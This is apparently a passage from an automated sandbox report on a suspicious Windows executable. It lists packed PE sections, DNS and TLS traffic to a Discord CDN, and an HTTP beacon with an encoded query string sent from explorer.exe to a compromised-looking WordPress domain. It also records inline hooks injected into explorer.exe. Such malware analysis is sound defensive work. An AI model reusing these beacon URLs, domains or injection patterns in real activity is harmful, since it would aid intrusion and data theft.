                                        .text | 0x1000 | 0x1d28 | 0x1e00 | False | 0.581510416667 | data | 5.9205123354 | IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_CNT_CODE, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
                                        .data | 0x3000 | 0xd0 | 0x200 | False | 0.130859375 | data | 0.806747366598 | IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
                                        .rdata | 0x4000 | 0x1530 | 0x1600 | False | 0.352450284091 | data | 4.41763079769 | IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
                                        .pdata | 0x6000 | 0x270 | 0x400 | False | 0.6533203125 | data | 5.62214281151 | IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
                                        .xdata | 0x7000 | 0x1f4 | 0x200 | False | 0.462890625 | data | 3.72511278935 | IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
                                        .bss | 0x8000 | 0x980 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
                                        .idata | 0x9000 | 0x7e8 | 0x800 | False | 0.53759765625 | data | 4.83593419899 | IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
                                        .CRT | 0xa000 | 0x68 | 0x200 | False | 0.056640625 | data | 0.170145652003 | IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
                                        .tls | 0xb000 | 0x10 | 0x200 | False | 0.02734375 | data | 0.0 | IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
                                        .vmp0 | 0xc000 | 0xec0 | 0x1000 | False | 0.83056640625 | data | 7.19991970418 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_NOT_PAGED, IMAGE_SCN_MEM_READ
                                        .cobf | 0xd000 | 0xbde | 0xc00 | False | 0.638997395833 | data | 6.157131337 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

                                        Imports

                                        DLL | Import
                                        KERNEL32.dll | Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep, Sleep
                                        msvcrt.dll | __C_specific_handler, __getmainargs, __initenv, __iob_func, __lconv_init, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _cexit, _fmode, _initterm, _onexit, abort, calloc, exit, exit, free, fwrite, malloc, memcpy, signal, strlen, strncmp, vfprintf
                                        USER32.dll |

                                        Network Behavior

                                        Snort IDS Alerts

                                        Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                        07/22/21-17:59:32.490432 | ICMP | 382 | ICMP PING Windows | | | 192.168.2.5 | 216.58.215.238
                                        07/22/21-17:59:32.490432 | ICMP | 384 | ICMP PING | | | 192.168.2.5 | 216.58.215.238
                                        07/22/21-17:59:32.532665 | ICMP | 408 | ICMP Echo Reply | | | 216.58.215.238 | 192.168.2.5

                                        Network Port Distribution

                                        TCP Packets

                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                        Jul 22, 2021 17:59:33.313534021 CEST | 49711 | 443 | 192.168.2.5 | 162.159.134.233
                                        Jul 22, 2021 17:59:33.354799032 CEST | 443 | 49711 | 162.159.134.233 | 192.168.2.5
                                        Jul 22, 2021 17:59:33.355076075 CEST | 49711 | 443 | 192.168.2.5 | 162.159.134.233
                                        Jul 22, 2021 17:59:33.381356955 CEST | 49711 | 443 | 192.168.2.5 | 162.159.134.233
                                        Jul 22, 2021 17:59:33.422544956 CEST | 443 | 49711 | 162.159.134.233 | 192.168.2.5
                                        Jul 22, 2021 17:59:33.423137903 CEST | 443 | 49711 | 162.159.134.233 | 192.168.2.5
                                        Jul 22, 2021 17:59:33.423166037 CEST | 443 | 49711 | 162.159.134.233 | 192.168.2.5
                                        Jul 22, 2021 17:59:33.423295021 CEST | 49711 | 443 | 192.168.2.5 | 162.159.134.233
                                        Jul 22, 2021 17:59:33.460189104 CEST | 49711 | 443 | 192.168.2.5 | 162.159.134.233
                                        Jul 22, 2021 17:59:33.502388000 CEST | 443 | 49711 | 162.159.134.233 | 192.168.2.5
                                        Jul 22, 2021 17:59:33.502476931 CEST | 443 | 49711 | 162.159.134.233 | 192.168.2.5
                                        Jul 22, 2021 17:59:33.502589941 CEST | 49711 | 443 | 192.168.2.5 | 162.159.134.233
                                        Jul 22, 2021 17:59:33.504381895 CEST | 49711 | 443 | 192.168.2.5 | 162.159.134.233
                                        Jul 22, 2021 17:59:33.545577049 CEST | 443 | 49711 | 162.159.134.233 | 192.168.2.5
                                        Jul 22, 2021 17:59:33.589994907 CEST | 443 | 49711 | 162.159.134.233 | 192.168.2.5
                                        Jul 22, 2021 17:59:33.590024948 CEST | 443 | 49711 | 162.159.134.233 | 192.168.2.5
                                        Jul 22, 2021 17:59:33.590046883 CEST | 443 | 49711 | 162.159.134.233 | 192.168.2.5
                                        Jul 22, 2021 17:59:33.590065002 CEST | 443 | 49711 | 162.159.134.233 | 192.168.2.5
                                        Jul 22, 2021 17:59:33.590090036 CEST | 443 | 49711 | 162.159.134.233 | 192.168.2.5
                                        Jul 22, 2021 17:59:33.590112925 CEST | 443 | 49711 | 162.159.134.233 | 192.168.2.5
                                        Jul 22, 2021 17:59:33.590127945 CEST | 49711 | 443 | 192.168.2.5 | 162.159.134.233
                                        Jul 22, 2021 17:59:33.590136051 CEST | 443 | 49711 | 162.159.134.233 | 192.168.2.5
                                        Jul 22, 2021 17:59:33.590157986 CEST | 443 | 49711 | 162.159.134.233 | 192.168.2.5
                                        Jul 22, 2021 17:59:33.590182066 CEST | 49711 | 443 | 192.168.2.5 | 162.159.134.233
                                        Jul 22, 2021 17:59:33.590200901 CEST | 49711 | 443 | 192.168.2.5 | 162.159.134.233
                                        Jul 22, 2021 17:59:33.590910912 CEST | 443 | 49711 | 162.159.134.233 | 192.168.2.5
                                        Jul 22, 2021 17:59:33.590940952 CEST | 443 | 49711 | 162.159.134.233 | 192.168.2.5
                                        Jul 22, 2021 17:59:33.591077089 CEST | 49711 | 443 | 192.168.2.5 | 162.159.134.233
                                        Jul 22, 2021 17:59:33.591095924 CEST | 49711 | 443 | 192.168.2.5 | 162.159.134.233
                                        Jul 22, 2021 17:59:33.591895103 CEST | 443 | 49711 | 162.159.134.233 | 192.168.2.5
                                        Jul 22, 2021 17:59:33.591931105 CEST | 443 | 49711 | 162.159.134.233 | 192.168.2.5
                                        Jul 22, 2021 17:59:33.592003107 CEST | 49711 | 443 | 192.168.2.5 | 162.159.134.233
                                        Jul 22, 2021 17:59:33.592906952 CEST | 443 | 49711 | 162.159.134.233 | 192.168.2.5
                                        Jul 22, 2021 17:59:33.592931986 CEST | 443 | 49711 | 162.159.134.233 | 192.168.2.5
                                        Jul 22, 2021 17:59:33.592969894 CEST | 49711 | 443 | 192.168.2.5 | 162.159.134.233
                                        Jul 22, 2021 17:59:33.593012094 CEST | 49711 | 443 | 192.168.2.5 | 162.159.134.233
                                        Jul 22, 2021 17:59:33.593780994 CEST | 443 | 49711 | 162.159.134.233 | 192.168.2.5
                                        Jul 22, 2021 17:59:33.593811989 CEST | 443 | 49711 | 162.159.134.233 | 192.168.2.5
                                        Jul 22, 2021 17:59:33.593868017 CEST | 49711 | 443 | 192.168.2.5 | 162.159.134.233
                                        Jul 22, 2021 17:59:33.594769001 CEST | 443 | 49711 | 162.159.134.233 | 192.168.2.5
                                        Jul 22, 2021 17:59:33.594804049 CEST | 443 | 49711 | 162.159.134.233 | 192.168.2.5
                                        Jul 22, 2021 17:59:33.594871044 CEST | 49711 | 443 | 192.168.2.5 | 162.159.134.233
                                        Jul 22, 2021 17:59:33.594896078 CEST | 49711 | 443 | 192.168.2.5 | 162.159.134.233
                                        Jul 22, 2021 17:59:33.595767021 CEST | 443 | 49711 | 162.159.134.233 | 192.168.2.5
                                        Jul 22, 2021 17:59:33.595798969 CEST | 443 | 49711 | 162.159.134.233 | 192.168.2.5
                                        Jul 22, 2021 17:59:33.595869064 CEST | 49711 | 443 | 192.168.2.5 | 162.159.134.233
                                        Jul 22, 2021 17:59:33.596723080 CEST | 443 | 49711 | 162.159.134.233 | 192.168.2.5
                                        Jul 22, 2021 17:59:33.596754074 CEST | 443 | 49711 | 162.159.134.233 | 192.168.2.5
                                        Jul 22, 2021 17:59:33.596821070 CEST | 49711 | 443 | 192.168.2.5 | 162.159.134.233
                                        Jul 22, 2021 17:59:33.597675085 CEST | 443 | 49711 | 162.159.134.233 | 192.168.2.5
                                        Jul 22, 2021 17:59:33.597702026 CEST | 443 | 49711 | 162.159.134.233 | 192.168.2.5
                                        Jul 22, 2021 17:59:33.597737074 CEST | 49711 | 443 | 192.168.2.5 | 162.159.134.233
                                        Jul 22, 2021 17:59:33.597771883 CEST | 49711 | 443 | 192.168.2.5 | 162.159.134.233
                                        Jul 22, 2021 17:59:33.598653078 CEST | 443 | 49711 | 162.159.134.233 | 192.168.2.5
                                        Jul 22, 2021 17:59:33.598686934 CEST | 443 | 49711 | 162.159.134.233 | 192.168.2.5
                                        Jul 22, 2021 17:59:33.598737955 CEST | 49711 | 443 | 192.168.2.5 | 162.159.134.233
                                        Jul 22, 2021 17:59:33.598783970 CEST | 49711 | 443 | 192.168.2.5 | 162.159.134.233
                                        Jul 22, 2021 17:59:33.599637032 CEST | 443 | 49711 | 162.159.134.233 | 192.168.2.5
                                        Jul 22, 2021 17:59:33.599668980 CEST | 443 | 49711 | 162.159.134.233 | 192.168.2.5
                                        Jul 22, 2021 17:59:33.599728107 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.600619078 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.600646019 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.600697994 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.601591110 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.601619959 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.601681948 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.601716995 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.602497101 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.603399992 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.632543087 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.632596970 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.632664919 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.632839918 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.632945061 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.633280039 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.633335114 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.633423090 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.633924961 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.633969069 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.634002924 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.634030104 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.634877920 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.634928942 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.634946108 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.634985924 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.635870934 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.635915041 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.635962963 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.636019945 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.636827946 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.636868954 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.636960030 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.637772083 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.637813091 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.637886047 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.637927055 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.638742924 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.638786077 CEST44349711162.159.134.233192.168.2.5
                                        Jul 22, 2021 17:59:33.638839006 CEST49711443192.168.2.5162.159.134.233
                                        Jul 22, 2021 17:59:33.638868093 CEST49711443192.168.2.5162.159.134.233

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 22, 2021 17:59:15.966249943 CEST | 54795 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 17:59:16.018271923 CEST | 53 | 54795 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 17:59:17.030975103 CEST | 49557 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 17:59:17.081573963 CEST | 53 | 49557 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 17:59:17.835160017 CEST | 61733 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 17:59:17.887351990 CEST | 53 | 61733 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 17:59:18.366911888 CEST | 65447 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 17:59:18.432480097 CEST | 53 | 65447 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 17:59:19.198745966 CEST | 52441 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 17:59:19.248092890 CEST | 53 | 52441 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 17:59:20.662686110 CEST | 62176 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 17:59:20.712065935 CEST | 53 | 62176 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 17:59:21.769877911 CEST | 59596 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 17:59:21.819135904 CEST | 53 | 59596 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 17:59:22.737807035 CEST | 65296 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 17:59:22.795145988 CEST | 53 | 65296 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 17:59:23.640221119 CEST | 63183 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 17:59:23.689425945 CEST | 53 | 63183 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 17:59:25.277851105 CEST | 60151 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 17:59:25.334655046 CEST | 53 | 60151 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 17:59:32.378942013 CEST | 56969 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 17:59:32.429265022 CEST | 53 | 56969 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 17:59:32.432296038 CEST | 55161 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 17:59:32.489460945 CEST | 53 | 55161 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 17:59:33.240242004 CEST | 54757 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 17:59:33.302604914 CEST | 53 | 54757 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 17:59:42.491311073 CEST | 49992 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 17:59:42.574757099 CEST | 53 | 49992 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 17:59:49.367983103 CEST | 60075 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 17:59:49.435719013 CEST | 53 | 60075 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 18:00:09.963759899 CEST | 55016 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 18:00:10.026026964 CEST | 53 | 55016 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 18:00:13.805746078 CEST | 64345 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 18:00:13.880527973 CEST | 53 | 64345 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 18:00:26.398986101 CEST | 57128 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 18:00:26.463774920 CEST | 53 | 57128 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 18:00:30.650922060 CEST | 54791 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 18:00:30.700320959 CEST | 53 | 54791 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 18:00:57.994560957 CEST | 50463 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 18:00:58.188177109 CEST | 53 | 50463 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 18:01:04.873130083 CEST | 50394 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 18:01:04.944116116 CEST | 53 | 50394 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 18:01:07.035242081 CEST | 58530 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 18:01:07.109100103 CEST | 53 | 58530 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 18:01:19.086133957 CEST | 53813 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 18:01:19.148035049 CEST | 53 | 53813 | 8.8.8.8 | 192.168.2.5

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jul 22, 2021 17:59:32.378942013 CEST | 192.168.2.5 | 8.8.8.8 | 0xa53f | Standard query (0) | google.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:59:32.432296038 CEST | 192.168.2.5 | 8.8.8.8 | 0xb7ca | Standard query (0) | google.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:59:33.240242004 CEST | 192.168.2.5 | 8.8.8.8 | 0x4bc7 | Standard query (0) | cdn.discordapp.com | A (IP address) | IN (0x0001)
Jul 22, 2021 18:00:57.994560957 CEST | 192.168.2.5 | 8.8.8.8 | 0xe518 | Standard query (0) | www.rajuherbalandspicegarden.com | A (IP address) | IN (0x0001)
Jul 22, 2021 18:01:19.086133957 CEST | 192.168.2.5 | 8.8.8.8 | 0x8d59 | Standard query (0) | www.strawberrylinebikehire.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jul 22, 2021 17:59:32.429265022 CEST | 8.8.8.8 | 192.168.2.5 | 0xa53f | No error (0) | google.com | | 216.58.215.238 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:59:32.489460945 CEST | 8.8.8.8 | 192.168.2.5 | 0xb7ca | No error (0) | google.com | | 216.58.215.238 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:59:33.302604914 CEST | 8.8.8.8 | 192.168.2.5 | 0x4bc7 | No error (0) | cdn.discordapp.com | | 162.159.134.233 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:59:33.302604914 CEST | 8.8.8.8 | 192.168.2.5 | 0x4bc7 | No error (0) | cdn.discordapp.com | | 162.159.133.233 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:59:33.302604914 CEST | 8.8.8.8 | 192.168.2.5 | 0x4bc7 | No error (0) | cdn.discordapp.com | | 162.159.135.233 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:59:33.302604914 CEST | 8.8.8.8 | 192.168.2.5 | 0x4bc7 | No error (0) | cdn.discordapp.com | | 162.159.129.233 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:59:33.302604914 CEST | 8.8.8.8 | 192.168.2.5 | 0x4bc7 | No error (0) | cdn.discordapp.com | | 162.159.130.233 | A (IP address) | IN (0x0001)
Jul 22, 2021 18:00:58.188177109 CEST | 8.8.8.8 | 192.168.2.5 | 0xe518 | No error (0) | www.rajuherbalandspicegarden.com | rajuherbalandspicegarden.com | | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 18:00:58.188177109 CEST | 8.8.8.8 | 192.168.2.5 | 0xe518 | No error (0) | rajuherbalandspicegarden.com | | 192.185.17.130 | A (IP address) | IN (0x0001)
Jul 22, 2021 18:01:19.148035049 CEST | 8.8.8.8 | 192.168.2.5 | 0x8d59 | Name error (3) | www.strawberrylinebikehire.com | none | none | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• www.rajuherbalandspicegarden.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49724 | 192.185.17.130 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 18:00:58.357666969 CEST | 7373 | OUT | GET /pjje/?bxl0d=DltNRLknYIPOXZZpswXifEZmZKsLvkDXv3EaEi+D7UBg3hXwO76Ip4IkAw1khMTnG44t&r48tw=4hF0dRLhcH HTTP/1.1
Host: www.rajuherbalandspicegarden.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jul 22, 2021 18:00:59.770776987 CEST | 7375 | IN | HTTP/1.1 301 Moved Permanently
Date: Thu, 22 Jul 2021 16:00:59 GMT
Server: nginx/1.19.10
Content-Type: text/html; charset=UTF-8
Content-Length: 0
X-UA-Compatible: IE=edge
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Redirect-By: WordPress
Location: http://rajuherbalandspicegarden.com/pjje/?bxl0d=DltNRLknYIPOXZZpswXifEZmZKsLvkDXv3EaEi+D7UBg3hXwO76Ip4IkAw1khMTnG44t&r48tw=4hF0dRLhcH
X-Endurance-Cache-Level: 2
X-Server-Cache: true
X-Proxy-Cache: MISS


HTTPS Packets

Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
Jul 22, 2021 17:59:33.423166037 CEST | 162.159.134.233 | 443 | 192.168.2.5 | 49711 | CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US; CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US; CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE | Tue Jan 19 01:00:00 CET 2021; Mon Jan 27 13:48:08 CET 2020 | Wed Jan 19 00:59:59 CET 2022; Wed Jan 01 00:59:59 CET 2025 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 37f463bf4616ecd445d4a1937da06e19

Code Manipulations

User Modules

Hook Summary

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

Processes

Process: explorer.exe, Module: user32.dll
Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x86 0x6E 0xE3
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8E 0xEE 0xE3
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8E 0xEE 0xE3
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x86 0x6E 0xE3

                                        Statistics

                                        Behavior


                                        System Behavior

                                        General

                                        Start time:17:59:22
                                        Start date:22/07/2021
                                        Path:C:\Users\user\Desktop\s2rsXUiUn8.exe
                                        Wow64 process (32bit):false
                                        Commandline:'C:\Users\user\Desktop\s2rsXUiUn8.exe'
                                        Imagebase:0x400000
                                        File size:26624 bytes
                                        MD5 hash:F5041EC4CE468A07ECBFD076BC0F879B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low

                                        General

                                        Start time:17:59:23
                                        Start date:22/07/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7ecfc0000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

